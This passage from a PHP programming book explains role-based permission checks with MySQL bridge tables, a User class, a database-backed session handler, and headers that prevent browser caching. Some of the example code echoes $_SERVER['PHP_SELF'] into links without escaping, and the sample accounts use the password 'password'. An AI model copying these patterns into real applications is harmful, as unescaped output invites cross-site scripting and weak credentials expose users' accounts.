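    foreach ($groups as $group) {
        if (isset($groupPermissions[$group])) {
            $permissions = array_merge($permissions, $groupPermissions[$group]);
        }
    }
    // Remove duplicates that arise when two groups share a permission
    return array_values(array_unique($permissions));
}

// True if any of the user's groups grants the named permission.
function userCan($user, $permission, array $userGroups, array $groupPermissions)
{
    return in_array(
        $permission,
        permissionsFor($user, $userGroups, $groupPermissions),
        true
    );
}

var_dump(userCan('alice', 'delete', $userGroups, $groupPermissions));
var_dump(userCan('bob', 'delete', $userGroups, $groupPermissions));
```

The two arrays play the role that lookup tables play in a database: one maps users to groups, the other maps groups to permissions, and a permission check walks both.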
  • 364. In practical terms, the way to build many-to-many relationships in MySQL is to use a bridge table, which relates to two other tables. The bridge table stores a two-column index, each column being the key of one of the two related tables. For example, we have a user table and a collection table in our database. Here’s the SQL for those tables: access_control.sql (excerpt) CREATE TABLE user ( user_id INT(11) NOT NULL AUTO_INCREMENT, login VARCHAR(50) NOT NULL DEFAULT '', password VARCHAR(50) NOT NULL DEFAULT '', email VARCHAR(50) DEFAULT NULL, firstName VARCHAR(50) DEFAULT NULL, lastName VARCHAR(50) DEFAULT NULL, signature TEXT NOT NULL, PRIMARY KEY (user_id), UNIQUE KEY user_login (login) ); CREATE TABLE collection ( collection_id INT(11) NOT NULL AUTO_INCREMENT, name VARCHAR(50) NOT NULL DEFAULT '', description TEXT NOT NULL, PRIMARY KEY (collection_id) ); Each user has a unique ID and login name, and several other pieces of information associated with his or her record. Each group has a unique ID, a name, and a description. We’ll use a bridge table to link users to their groups, and groups to their users. Here’s the definition of the user2collection lookup table: access_control.sql (excerpt) CREATE TABLE user2collection ( user_id INT(11) NOT NULL DEFAULT '0', collection_id INT(11) NOT NULL DEFAULT '0', PRIMARY KEY (user_id, collection_id) );
  • 365. Notice that the primary key for the table uses both columns: this ensures that no combination of user_id and collection_id can appear more than once. Be Aware of Reserved Words I use “collection” to refer to “group” in MySQL. “Group” is a reserved word in SQL, so it shouldn’t be used as a table name. Technically, it can be used with the proper quoting, but why run the risk of confusing ourselves—and possibly MySQL? You can find more about SQL reserved words at the MySQL web site.12 Here’s some hypothetical data that shows how the bridge table can be used: mysql> select * from user2collection; +---------+---------------+ | user_id | collection_id | +---------+---------------+ | 1 | 1 | | 2 | 1 | | 2 | 2 | | 3 | 1 | | 4 | 1 | +---------+---------------+ 5 rows in set (0.00 sec) This data tells us that user 1 is a member of group 1, user 2 is a member of groups 1 and 2, user 3 is a member of group 1, and so on. We’ll also need a permission table for the purpose of keeping track of permissions: access_control.sql (excerpt) CREATE TABLE permission ( permission_id INT(11) NOT NULL AUTO_INCREMENT, name VARCHAR(50) NOT NULL DEFAULT '', description TEXT NOT NULL, PRIMARY KEY (permission_id) ); 12 http://dev.mysql.com/doc/refman/4.1/en/reserved-words.html
  • 366. Each permission has a unique ID, a name, and a description. Permission names will represent actions: view, create, edit, and delete, for example. We’ll need a bridge table to link groups to permissions—here’s the collection2permission table: access_control.sql (excerpt) CREATE TABLE collection2permission ( collection_id INT(11) NOT NULL DEFAULT '0', permission_id INT(11) NOT NULL DEFAULT '0', PRIMARY KEY (collection_id, permission_id) ); With the lookup tables defined, we can now perform queries across the tables to identify the permissions a particular user has been allowed. For example, the following query returns all the permission names for the user with user_id 1: SELECT p.name AS permission FROM user2collection uc INNER JOIN collection2permission cp ON uc.collection_id = cp.collection_id INNER JOIN permission p ON cp.permission_id = p.permission_id WHERE uc.user_id = 1; Note that I’ve used aliases for table names, such as user2collection uc, to make writing the query easier. If you’ve downloaded and installed the sample access_control database mentioned in the introduction to this chapter, you’ll find it contains three sample user accounts with the details shown in Table 10.1. Table 10.1. Sample User Accounts (Login / Password / Group): jackblack / password / Users; jackwhite / password / Editors; siteadmin / password / Administrators
  • 367. The access_control database also contains three sample groups, as shown in Table 10.2. Table 10.2. Sample Groups (Group: Permissions): Users: view; Editors: view, create, edit; Administrators: view, create, edit, delete The User Class The User class will encapsulate all the functionality for checking a user’s permissions. Our class uses the following configuration settings: access_control.ini (excerpt) ; Access Control Settings ;web form variables e.g. $_POST['login'] [login_vars] login=login ;user login table details [users_table] table=user col_id=user_id col_login=login col_password=password col_email=email col_name_first=firstName col_name_last=lastName col_signature=signature ;Permission table details [permission_table] table=permission col_id=permission_id col_name=name ;Collection table details [collection_table] table=collection
  • 368. 344 The PHP Anthology col_id=collection_id col_name=name ;User to Collection lookup table details [user_to_collection_table] table=user2collection col_id=user_id col_collection_id=collection_id ;Collection to Permission lookup table details [collection_to_permission_table] table=collection2permission col_id=collection_id col_permission_id=permission_id We define some custom exception classes to provide a consistent level of error handling: User.class.php (excerpt) class UserException extends Exception { public function __construct($message = null, $code = 0) { parent::__construct($message, $code); error_log('Error in '.$this->getFile(). ' Line: '.$this->getLine(). ' Error: '.$this->getMessage() ); } } class UserDatabaseException extends UserException {} Our base class, UserException, is a custom exception that ensures the exception details are logged using the error_log function. The subclass UserDatabaseException represents a database problem. If you were to add further functionality to the User class, you could create further custom exceptions based on the UserException class to cover all possible exception situations. We begin to create the class by defining some class properties:
  • 369. Access Control 345 User.class.php (excerpt) class User { private $db; protected $cfg; private $userId; private $firstName; private $lastName; private $email; $db will contain a PDO instance for our database connection, $cfg will store our configuration details, and the remaining properties will contain information from the user’s account details. The constructor takes an instance of the PDO class, loads the configuration file, and calls the populate method: User.class.php (excerpt) public function __construct(PDO $db) { $this->db = $db; $this->cfg = parse_ini_file('access_control.ini', TRUE); $this->populate(); } Next comes the populate method: User.class.php (excerpt) private function populate() { $var_login = $this->cfg['login_vars']['login']; $user_table = $this->cfg['users_table']['table']; $user_id = $this->cfg['users_table']['col_id']; $user_login = $this->cfg['users_table']['col_login']; $user_email = $this->cfg['users_table']['col_email']; $user_first = $this->cfg['users_table']['col_name_first']; $user_last = $this->cfg['users_table']['col_name_last'];
  • 370. 346 The PHP Anthology We load some configuration values into local variables to aid the readability of the code. Next, we attempt to look up the user’s details in the database: User.class.php (excerpt) $session = new Session(); try { $sql = "SELECT " . $user_id . ", " . $user_email . ", " . $user_first . ", " . $user_last . " FROM " . $user_table . " WHERE " . $user_login . " = :login"; $stmt = $this->db->prepare($sql); $login = $session->get($var_login); $stmt->bindParam(':login', $login); $stmt->execute(); $row = $stmt->fetch(PDO::FETCH_ASSOC); } catch(PDOException $e) { throw new UserDatabaseException('Database error when' . ' populating user details: '.$e->getMessage()); } We first need to instantiate a new session object (which we built in “How do I create a session class?”). The session login variable is then used as the key to find the user’s details in the user table. If a PDOException is thrown, we throw our custom UserDatabaseException. Once we’ve retrieved the user’s record from the database, we store all the detail in the User object properties:
  • 371. User.class.php (excerpt) $this->userId = $row[$user_id]; $this->email = $row[$user_email]; $this->firstName = $row[$user_first]; $this->lastName = $row[$user_last]; } The populate method pulls this user’s record from the database and stores various useful pieces of information from that record in the object’s properties so that we can access them easily; for example, when we want to display the user’s name on the page. The most important aspect is to gather the user_id value from the database, for the purpose of checking permissions. We also add a few accessor methods. Accessor methods allow public access to otherwise private object properties—they allow the properties to be read without granting users of the class public access to write to them: User.class.php (excerpt) public function getId() { return $this->userId; } public function getFirstName() { return $this->firstName; } public function getLastName() { return $this->lastName; } public function getEmail() { return $this->email; } Finally, we add the checkPermission method. This method takes a named permission as an argument and checks that the user has that permission:
  • 372. User.class.php (excerpt) public function checkPermission($permission) { if (!isset($this->permissions)) { $perm_table = $this->cfg['permission_table']['table']; $perm_id = $this->cfg['permission_table']['col_id']; $perm_name = $this->cfg['permission_table']['col_name']; $u2c_table = $this->cfg['user_to_collection_table']['table']; $u2c_id = $this->cfg['user_to_collection_table']['col_id']; $c2p_table = $this->cfg['collection_to_permission_table']['table']; $c2p_id = $this->cfg['collection_to_permission_table']['col_id']; $c2p_pid = $this->cfg['collection_to_permission_table']['col_permission_id']; The first step we take is to check whether the permissions array for this user has been set. If not, we proceed with the database lookup. Before we perform the lookup, though, we assign some configuration settings to local variables to help improve our code’s readability. Next, we assemble the SQL query and perform the lookup using the User->userId property as the key: User.class.php (excerpt) try { $this->permissions = array(); $sql = 'SELECT p.'. $perm_name .' as permission FROM ' . $u2c_table . ' uc INNER JOIN ' . $c2p_table . ' cp ON uc.' . $u2c_id . ' = cp.' . $c2p_id . ' INNER JOIN ' . $perm_table . ' p ON cp.' . $c2p_pid . ' = p.' . $perm_id . ' WHERE uc.user_id = :user'; $stmt = $this->db->prepare($sql); $stmt->bindParam(':user', $this->userId);
  • 373. $stmt->execute(); while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) { $this->permissions[] = $row['permission']; } } catch(PDOException $e) { throw new UserDatabaseException('Database error when' . ' checking permissions: '.$e->getMessage()); } } If the lookup has returned database rows, we store the permission names in the object’s permissions array. This means that if we need to check permissions more than once on a page, those checks will only come at the cost of a single query. And, as usual, if a PDOException is thrown, we in turn throw our custom UserDatabaseException. Finally, we check that the permission passed into the method as an argument in the $permission variable is included in the user’s permissions array: User.class.php (excerpt) if (in_array($permission, $this->permissions)) { return true; } else { return false; } } } The checkPermission method simply returns true if the user has the permission, and false if not. The Permissions Test Page Now, to test our permissions system, we can build a permissions testing page. This testing page will require you to log in using the details of one of the accounts in the
  • 374. 350 The PHP Anthology user table, and will simulate an attempt to access one of four defined permission levels in the permission table—view, create, edit, and delete. First, we need to include all the required classes and the database credentials file: permissions.php (excerpt) <?php require_once 'Session.class.php'; require_once 'Auth.class.php'; require_once 'User.class.php'; require_once 'dbcred.php'; Next, we instantiate our PDO, Auth (which we met in “How do I create a class to control access to a section of the site?”), and User objects: permissions.php (excerpt) try { $db = new PDO($dsn, $user, $password); $auth = new Auth($db, 'login.php', 'secret'); $authuser = new User($db); The Auth object will make sure the current user is authorized, and redirect them to the login form if not. If the user is authorized, we create a User object in order to be able to check the user’s permissions. We’re simulating permissions through a query string variable—$_GET['view']: permissions.php (excerpt) switch (@$_GET['view']) { case 'create': $permission = 'create'; $msg = 'You are able to create new content.'; break; case 'edit': $permission = 'edit'; $msg = 'You are able to edit existing content.'; break; case 'delete':
  • 375. Access Control 351 $permission = 'delete'; $msg = 'You are able to delete existing content.'; break; default: $permission = 'view'; $msg = 'You are able to read existing content.'; } We set the permission level and the $msg variable—the message that appears on the page—to reflect the value of $_GET['view']. Next, we test the user’s permissions: permissions.php (excerpt) if (!$authuser->checkPermission($permission)) { $msg = 'You do not have permission to do this.'; } If the user doesn’t have the required permission, we take appropriate action. Since this demonstration is merely a test, we simply set the page message to indicate that the user does not have the required permission level. In a production web applica­ tion, you’d redirect the user to the login form, adding a message to indicate that they’re not authorized to obtain that level of access. Finally, we make sure to catch any exceptions and take appropriate action: permissions.php (excerpt) } catch (Exception $e) { $msg = 'An error has occurred: ' . $e->getMessage(); } ?> The only task left is to create the HTML for our permissions testing page:
  • 376. permissions.php (excerpt) <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> ⋮ HTML Head contents… </head> <body> <h1>Permissions Test</h1> <p> <a href="<?php echo $_SERVER['PHP_SELF']; ?>">View</a> | <a href="<?php echo $_SERVER['PHP_SELF']; ?>?view=create">Create</a> | <a href="<?php echo $_SERVER['PHP_SELF']; ?>?view=edit">Edit</a> | <a href="<?php echo $_SERVER['PHP_SELF']; ?>?view=delete">Delete</a> </p> <h2><?php echo $authuser->getFirstName() . ' ' . $authuser->getLastName(); ?></h2> <p>Permission Level: '<?php echo $permission ?>'</p> <p><?php echo $msg; ?></p> </body> </html> The testing page is very simple. First, we have a menu of links that test each permission level by appending the appropriate query string to the link URLs. Then, we have a simple page body that consists of the current user’s name, the current permission level, and the message set by the permissions test. Discussion The User class fetches data on a “need to know” basis. That is, although some user data is retrieved on instantiation using the populate method, the data pertaining to permissions may not be needed every time the User class is instantiated. It’s likely that we’ll only check permissions on a restricted number of pages, so we can save ourselves a database query when the user views public pages, and leave the checkPermission method to be called only when needed. This approach of only fetching data from the database at the moment it is needed—as opposed to performing all the queries at the beginning—is known as lazy fetching, and can be a useful approach to reducing unnecessary queries and performance overhead.
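The lazy fetching idea described above can be shown in isolation. The sketch below is an assumption-laden illustration: LazyPermissions is a hypothetical class, and the loader callback stands in for the database query that the checkPermission method performs. The loadCount property exists only to make the behavior visible.

```php
<?php
// Hypothetical class for illustration; not part of the book's User class.
class LazyPermissions
{
    private $loader;
    private $permissions = null; // null means "not fetched yet"
    public $loadCount = 0;       // exposed only to observe how often we load

    public function __construct($loader)
    {
        $this->loader = $loader;
    }

    public function has($permission)
    {
        if ($this->permissions === null) {
            // First call: run the expensive lookup and remember the result
            $this->permissions = call_user_func($this->loader);
            $this->loadCount++;
        }
        return in_array($permission, $this->permissions, true);
    }
}

// The closure stands in for a database query returning permission names.
$perms = new LazyPermissions(function () {
    return array('view', 'edit');
});
```

Constructing the object costs nothing; the loader runs on the first call to has() and its result is reused for every later check in the same request.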
  • 377. The permissions testing page was a simple example, of course, but you could use the checkPermission method any way you like—perhaps within if statements to decide what a user is allowed to do and see. Another approach would be to use a variable, such as the $msg variable we’ve used here, to store the name of a PHP script, which contained the restricted content, for use with an include statement. Otherwise, that’s all there is to it. Now, all you need to do is build an administration interface to control Users, Groups, and Permissions. Well, what are you waiting for? How do I store sessions in a database? As discussed earlier, in “How do I use sessions?”, the default behavior of sessions in PHP on the server side is to create a temporary file in which session data is stored. This file is usually kept in the temporary directory of the operating system and, as such, presents a security risk to your applications, especially if you’re using a shared server. Solution Use the PHP function session_set_save_handler to specify a custom session handler that provides an alternative data store that’s fully under your control. The session_set_save_handler function definition is as follows: bool session_set_save_handler (callback $open, callback $close, callback $read, callback $write, callback $destroy, callback $gc ); Each callback argument is a function that must conform to the PHP session’s API. You can read more about the function on the PHP Manual page.13 You can simply implement a separate function for each callback; however, in this solution we create a new class—the DatabaseSession class—to encapsulate all our session handling needs, and use a PDO object to connect to a database and store session information there. 13 http://www.php.net/session_set_save_handler/
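To make the shape of the six callbacks concrete before looking at the database version, here is a minimal sketch that keeps session data in an array. Everything in it is an assumption for illustration: ArraySessionStore and registerStore are hypothetical names, and an array only lives for a single request, so this shows the callback signatures rather than a usable session store. The callbacks return true in the style used in this chapter; I believe recent PHP versions document an integer count of deleted sessions as the return value of the gc callback, so check the manual for the version you run.

```php
<?php
// Illustrative only: an array-backed store that lasts for one request.
class ArraySessionStore
{
    private $data = array();

    // Called when the session starts; nothing to set up for an array
    public function open($path, $name)
    {
        return true;
    }

    public function close()
    {
        return true;
    }

    // read must return a string, empty when nothing is stored for the ID
    public function read($id)
    {
        return isset($this->data[$id]) ? $this->data[$id] : '';
    }

    public function write($id, $value)
    {
        $this->data[$id] = $value;
        return true;
    }

    public function destroy($id)
    {
        unset($this->data[$id]);
        return true;
    }

    // Garbage collection: nothing expires in this sketch
    public function gc($maxLifetime)
    {
        return true;
    }
}

// Registers the six callbacks; call this before session_start().
function registerStore(ArraySessionStore $store)
{
    return session_set_save_handler(
        array($store, 'open'),
        array($store, 'close'),
        array($store, 'read'),
        array($store, 'write'),
        array($store, 'destroy'),
        array($store, 'gc')
    );
}

// Exercise the store directly, without starting a real session.
$store = new ArraySessionStore();
$store->write('abc', 'login|s:4:"jack";');
```

Passing array($object, 'method') pairs as callbacks is what lets a class such as DatabaseSession keep its connection and settings in properties instead of global variables.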
  • 378. 354 The PHP Anthology Before we delve deep into the details of the class, I’ll show you the create statement for the session table we use. This statement provides a minimal amount of inform­ ation for you to keep track of, so feel free to add more if you wish—for example, you might like to store the IP address or the last page visited. Just remember to add the new columns and values to the queries that are used throughout the class’s methods below: CREATE TABLE session ( sess_id VARCHAR(255), sess_start DATETIME, sess_last_acc DATETIME, sess_data VARCHAR(255), PRIMARY KEY (sess_id) ); The DatabaseSession Class Now, let’s look at the class. We begin by defining the class properties: DatabaseSession.class.php (excerpt) class DatabaseSession { private $sess_table; private $sess_db; private $sess_db_host; private $sess_db_usr; private $sess_db_pass; private $db; $sess_table will store the database table name, $sess_db will store the database name, $sess_db_host will store the database server hostname, $sess_db_usr will store the database username, and $sess_db_pass will store the database password. The $db property will store the PDO object used for all the database queries. Next, we define the constructor method:
  • 379. DatabaseSession.class.php (excerpt)

    public function __construct($sess_db_usr = 'user',
        $sess_db_pass = 'passwd', $sess_table = 'session',
        $sess_db = 'dbname', $sess_db_host = 'localhost')
    {
      $this->sess_db_usr = $sess_db_usr;
      $this->sess_db_pass = $sess_db_pass;
      $this->sess_table = $sess_table;
      $this->sess_db = $sess_db;
      $this->sess_db_host = $sess_db_host;
    }

The constructor simply stores the database information passed to the method within the object’s properties.

The first function callback that we must pass to the session_set_save_handler function is an open function, which is called when a session is started. The open method of the DatabaseSession class will handle that job:

DatabaseSession.class.php (excerpt)

    public function open($path, $name)
    {
      try
      {
        $dsn = "mysql:host={$this->sess_db_host};".
            "dbname={$this->sess_db}";
        $this->db = new PDO($dsn, $this->sess_db_usr,
            $this->sess_db_pass );
        $this->db->setAttribute(PDO::ATTR_ERRMODE,
            PDO::ERRMODE_EXCEPTION);
      }
      catch (PDOException $e)
      {
        error_log('Error connecting to the session database.');
        error_log('Reason given:'.$e->getMessage()."\n");
        return false;
      }
      return true;
    }
  • 380. This method is called with two string arguments, the session save path and the session name, and must return either true or false. Both values are irrelevant to us as we’re using a database, so we do nothing with them. In the method, we make the connection to the database that will hold the session data. If there’s an error, we return false; if the database connection is successful, we return true.

The next function callback we need to implement is the close function, so we add a close method to our class:

DatabaseSession.class.php (excerpt)

    public function close()
    {
      $this->db = null;
      return true;
    }

The close method is called when we end a session, and must return either true or false. It isn’t uncommon to manually call the garbage collection (gc) method here, though it isn’t strictly necessary, as PHP will do its own garbage collection throughout. We remove our database connection by setting the $db property to null.

session_set_save_handler also requires that a read function be implemented. The read function needs to take the session ID as an argument and return a string, even an empty one, if that’s appropriate. We implement a read method in our class:

DatabaseSession.class.php (excerpt)

    public function read($sess_id)
    {
      try
      {
        $sql = "SELECT sess_data FROM {$this->sess_table} WHERE " .
            "sess_id = :id";
        $stmt = $this->db->prepare($sql);
        $stmt->execute(array(':id'=>$sess_id));
        $res = $stmt->fetchAll(PDO::FETCH_ASSOC);
      }
      catch (PDOException $e)
  • 381.
      {
        error_log('Error reading the session data table in the' .
            ' session reading method.');
        error_log(' Query with error: '.$sql);
        error_log(' Reason given:'.$e->getMessage()."\n");
        return '';
      }
      if (count($res) > 0)
      {
        return isset($res[0]['sess_data']) ?
            $res[0]['sess_data'] : '';
      }
      else
      {
        return '';
      }
    }

The read method retrieves the session data from the database, using the session ID as the key, and returns the data as a string. If no data is found or there’s a database error, an empty string is returned.

After the read function, the next function callback we need to implement is the write function. This function, as the name implies, handles the writing of the session data. The function is required to take two arguments, the session ID and the session data, and the return value must be either true or false. We implement a write method in our class-based solution. In our method, we first see if the session ID is already in the database:

DatabaseSession.class.php (excerpt)

    public function write($sess_id, $data)
    {
      try
      {
        $sql = "SELECT sess_data FROM {$this->sess_table} WHERE " .
            "sess_id = :id";
        $stmt = $this->db->prepare($sql);
        $stmt->execute(array(':id'=>$sess_id));
        $res = $stmt->fetchAll(PDO::FETCH_ASSOC);
      }
      catch (PDOException $e)
  • 382.
      {
        error_log('Error reading the session data table in the' .
            ' session writing method.');
        error_log(' Query with error: '.$sql);
        error_log(' Reason given:'.$e->getMessage()."\n");
        return false;
      }

The $res variable contains the result of our database lookup. Based upon this result, we either update the existing session record with an SQL UPDATE query or insert a new one with an SQL INSERT query:

DatabaseSession.class.php (excerpt)

      try
      {
        if (count($res) > 0)
        {
          $sql = "UPDATE {$this->sess_table} SET" .
              " sess_last_acc = NOW(), sess_data = :data" .
              " WHERE sess_id = :id";
          $stmt = $this->db->prepare($sql);
          $stmt->bindParam(':data', $data);
          $stmt->bindParam(':id', $sess_id);
        }
        else
        {
          $sql ="INSERT INTO {$this->sess_table}(sess_id," .
              " sess_start, sess_last_acc," .
              " sess_data) VALUES (:id, NOW(), NOW(), :data)";
          $stmt = $this->db->prepare($sql);
          $stmt->bindParam(':id', $sess_id);
          $stmt->bindParam(':data', $data);
        }
        $res = $stmt->execute();
      }
  • 383. If you know you’ll only be using MySQL as your database, consider using the REPLACE syntax instead.14 Since we don’t want to limit our class to MySQL, we use the longer but more compatible method above.

Finally, we need to catch any PDOExceptions and return true or false:

DatabaseSession.class.php (excerpt)

      catch (PDOException $e)
      {
        error_log('Error writing to the session data table.');
        error_log('Query with error: '.$sql);
        error_log('Reason given:'.$e->getMessage()."\n");
        return false;
      }
      return true;
    }

Our next task is to implement a destroy function, which, as the name suggests, is called when the session is destroyed. It receives the session ID as an argument and must return either true or false. In our class method destroy, we simply delete the session from the database using the session ID as the key, and return false if an error occurs or true if the operation succeeds:

DatabaseSession.class.php (excerpt)

    public function destroy($sess_id)
    {
      try
      {
        $sql = "DELETE FROM {$this->sess_table} WHERE sess_id = :id";
        $stmt = $this->db->prepare($sql);
        $stmt->execute(array(':id'=>$sess_id));
      }
      catch (PDOException $e)
      {
        error_log('Error destroying the session.');
        error_log('Query with error: '.$sql);

14 REPLACE is a MySQL extension to the SQL standard that either inserts a new row, or deletes an old row and inserts the new row if the old row had the same value as the new row for a PRIMARY KEY or UNIQUE index. You can read more about it at http://dev.mysql.com/doc/refman/5.1/en/replace.html.
  • 384.
        error_log('Reason given:'.$e->getMessage()."\n");
        return false;
      }
      return true;
    }

The final function we are required to implement is the gc, or garbage collection, function, which is used to clean out any old sessions that were never closed properly. It receives an integer argument for the “time to live” (TTL) value for a session. In our class method, gc, we delete any session record where the last access time is less than the current time, minus the TTL value:

DatabaseSession.class.php (excerpt)

    public function gc($ttl)
    {
      // sess_last_acc is a DATETIME column, so we compare it with a
      // DATETIME string rather than a raw Unix timestamp. This assumes
      // PHP and the database server use the same time zone.
      $end = date('Y-m-d H:i:s', time() - $ttl);
      try
      {
        $sql = "DELETE FROM {$this->sess_table} WHERE" .
            " sess_last_acc < :end";
        $stmt = $this->db->prepare($sql);
        $stmt->execute(array(':end'=>$end));
      }
      catch (PDOException $e)
      {
        error_log('Error with the garbage collection method of the' .
            ' session class.');
        error_log('Query with error: '.$sql);
        error_log('Reason given:'.$e->getMessage());
        return false;
      }
      return true;
    }

The garbage collection method is called by PHP as dictated by the php.ini settings session.gc_probability and session.gc_divisor, and is checked every time a new session is started. Again, you can call it manually in the session close method if you wish.
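As a rough illustration of how those two settings interact, the chance that PHP runs garbage collection on any given session start is gc_probability divided by gc_divisor. The gcChance function below is a hypothetical helper written for this sketch, not part of PHP or of the DatabaseSession class.

```php
<?php
// Hypothetical helper: the chance (0.0 to 1.0) that garbage collection
// runs when a session starts, given the two php.ini values.
function gcChance($probability, $divisor)
{
    if ($divisor <= 0) {
        return 0.0; // guard against division by zero on odd configurations
    }
    return (float) min(1, max(0, $probability) / $divisor);
}

// Read the live settings; ini_get returns false if a setting is unknown,
// which the (int) cast turns into 0.
$probability = (int) ini_get('session.gc_probability');
$divisor     = (int) ini_get('session.gc_divisor');

printf("gc runs on roughly %.2f%% of session starts\n",
    gcChance($probability, $divisor) * 100);
```

With PHP's built-in defaults of 1 and 100 this works out to about one session start in a hundred, though distributions and hosting providers often ship different values, so it's worth checking your own configuration.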
  • 385. Access Control 361 MySQL MyISAM Engine Performance If your session table sees high rates of insertions and deletions, you should consider adding an OPTIMIZE TABLE query to the garbage collection function to regain memory and help increase performance. For more information on OPTIMIZE TABLE, see the MySQL manual.15 Finally, we implement a class __destruct method. This step is necessitated by the changes that were made in how PHP sessions are closed after version 5.0.5. Basically, we just have to make sure the session is explicitly written and closed by calling the session_write_close function. You can read more about this task on the manual page.16 Here’s our __destruct method and the end of our class definition: DatabaseSession.class.php (excerpt) public function __destruct() { session_write_close(); } } Using the DatabaseSession Class Here’s a simple script to test our new DatabaseSession class: dbsession.php (excerpt) <?php require_once 'DatabaseSession.class.php'; $session = new DatabaseSession('user', 'secret', 'session', 'access_control','localhost'); session_set_save_handler(array($session, 'open'), array($session, 'close'), array($session, 'read'), array($session, 'write'), array($session, 'destroy'), array($session, 'gc') ); 15 http://dev.mysql.com/doc/refman/5.1/en/optimize-table.html 16 http://www.php.net/session_set_save_handler/
  • 386.
    session_start();
    $name = (isset($_SESSION['name']))? $_SESSION['name'] :'';
    if ($name !== '')
    {
      echo 'Welcome ', $name, ' to your session!';
    }
    else
    {
      echo "Let's start the session!";
      $_SESSION['name'] = 'PHP';
    }
    ?>

We include our DatabaseSession class, then instantiate the DatabaseSession object. Next, we use session_set_save_handler to register our custom PHP session-handling methods. Then we have a quick little demonstration to show us that the session is working: the first time you load the web page you should see the message “Let’s start the session!” We then set $_SESSION['name'] to PHP. When you refresh the web page, the message should change to “Welcome PHP to your session!”, which indicates that our session data is being stored in, and retrieved from, the database correctly. Welcome to database-saved sessions!

Summary

In this chapter we’ve investigated HTTP authentication and PHP sessions, and created a complete access control system that can manage user registrations, password resets, and changes, including authorization, groups, and multiple permission levels.

Phew! Well, there you have it: total access control over your site! Now you have the power to bark “Denied” at those that shouldn’t be in restricted areas, and roll out the red carpet for those that should. Can you feel the warm glow of power gathering within you? Will you use it for good, or evil? Either way, I hope you’ve enjoyed it and learned a bit along the way.
  • 387. 11 Chapter Caching In the good old days when building web sites was as easy as knocking up a few HTML pages, the delivery of a web page to a browser was a simple matter of having the web server fetch a file. A site’s visitors would see its small, text-only pages almost immediately, unless they were using particularly slow modems. Once the page was downloaded, the browser would cache it somewhere on the local computer so that, should the page be requested again, after performing a quick check with the server to ensure the page hadn’t been updated, the browser could display the locally cached version. Pages were served as quickly and efficiently as possible, and everyone was happy. Then dynamic web pages came along and spoiled the party by introducing two problems: ■ When a request for a dynamic web page is received by the server, some interme­ diate processing must be completed, such as the execution of scripts by the PHP engine. This processing introduces a delay before the web server begins to deliver the output to the browser. This may not be a significant delay where simple PHP scripts are concerned, but for a more complex application, the PHP engine may have a lot of work to do before the page is finally ready for delivery. This extra
  • 388. 364 The PHP Anthology work results in a noticeable time lag between the user’s requests and the actual display of pages in the browser. ■ A typical web server, such as Apache, uses the time of file modification to inform a web browser of a requested page’s age, allowing the browser to take appropriate caching action. With dynamic web pages, the actual PHP script may change only occasionally; meanwhile, the content it displays, which is often fetched from a database, will change frequently. The web server has no way of discerning up­ dates to the database, so it doesn’t send a last modified date. If the client (that is, the user’s browser) has no indication of how long the data will remain valid, it will take a guess. This is problematic if the browser decides to use a locally cached version of the page which is now out of date, or if the browser decides to request from the server a fresh copy of the page, which actually has no new content, making the request redundant. The web server will always respond with a freshly constructed version of the page, regardless of whether or not the data in the database has actually changed. To avoid the possibility of a web site visitor viewing out-of-date content, most web developers use a meta tag or HTTP headers to tell the browser never to use a cached version of the page. However, this negates the web browser’s natural ability to cache web pages, and entails some serious disadvantages. For example, the content delivered by a dynamic page may only change once a day, so there’s certainly a benefit to be gained by having the browser cache a page—even if only for 24 hours. If you’re working with a small PHP application, it’s usually possible to live with both issues. But as your site increases in complexity—and attracts more traffic—you’ll begin to run into performance problems. 
Both these issues can be solved, however: the first with server-side caching; the second, by taking control of client-side caching from within your application. The exact approach you use to solve these problems will depend on your application, but in this chapter, we’ll consider both PHP and a number of class libraries from PEAR as possible panaceas for your web page woes. Note that in this chapter’s discussions of caching, we’ll look at only those solutions that can be implemented in PHP. For a more general introduction, the definitive
  • 389. Caching 365 discussion of web caching is represented by Mark Nottingham’s tutorial.1 Further­ more, the solutions in this chapter should not be confused with some of the script caching solutions that work on the basis of optimizing and caching compiled PHP scripts, such as Zend Accelerator2 and ionCube PHP Accelerator.3 How do I prevent web browsers from caching a page? If timely information is crucial to your web site and you wish to prevent out-of-date content from ever being visible, you need to understand how to prevent web browsers—and proxy servers—from caching pages in the first place. Solutions There are two possible approaches we could take to solving this problem: using HTML meta tags, and using HTTP headers. Using HTML Meta Tags The most basic approach to the prevention of page caching is one that utilizes HTML meta tags: <meta http-equiv="expires" content="Mon, 26 Jul 1997 05:00:00 GMT"/> <meta http-equiv="pragma" content="no-cache" /> The insertion of a date that’s already passed into the Expires meta tag tells the browser that the cached copy of the page is always out of date. Upon encountering this tag, the browser usually won’t cache the page. Although the Pragma: no-cache meta tag isn’t guaranteed, it’s a fairly well-supported convention that most web browsers follow. However, the two issues associated with this approach, which we’ll discuss below, may prompt you to look at the alternative solution. Using HTTP Headers A better approach is to use the HTTP protocol itself, with the help of PHP’s header function, to produce the equivalent of the two HTML meta tags above: 1 http://www.mnot.net/cache_docs/ 2 http://www.zend.com/ 3 http://www.php-accelerator.co.uk/
  • 390. 366 The PHP Anthology <?php header('Expires: Mon, 26 Jul 1997 05:00:00 GMT'); header('Pragma: no-cache'); ?> We can go one step further than this, using the Cache-Control header that’s suppor­ ted by HTTP 1.1-capable browsers: <?php header('Expires: Mon, 26 Jul 1997 05:00:00 GMT'); header('Cache-Control: no-store, no-cache, must-revalidate'); header('Cache-Control: post-check=0, pre-check=0', FALSE); header('Pragma: no-cache'); ?> For a precise description of HTTP 1.1 Cache-Control headers, have a look at the W3C’s HTTP 1.1 RFC.4 Another great source of information about HTTP headers, which can be applied readily to PHP, is mod_perl’s documentation on issuing correct headers.5 Discussion Using the Expires meta tag sounds like a good approach, but two problems are as­ sociated with it: ■ The browser first has to download the page in order to read the meta tags. If a tag wasn’t present when the page was first requested by a browser, the browser will remain blissfully ignorant and keep its cached copy of the original. ■ Proxy servers that cache web pages, such as those common to ISPs, generally won’t read the HTML documents themselves. A web browser might know that it shouldn’t cache the page, but the proxy server between the browser and the web server probably doesn’t—it will continue to deliver the same out-of-date page to the client. On the other hand, using the HTTP protocol to prevent page caching essentially guarantees that no web browser or intervening proxy server will cache the page, so 4 http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9 5 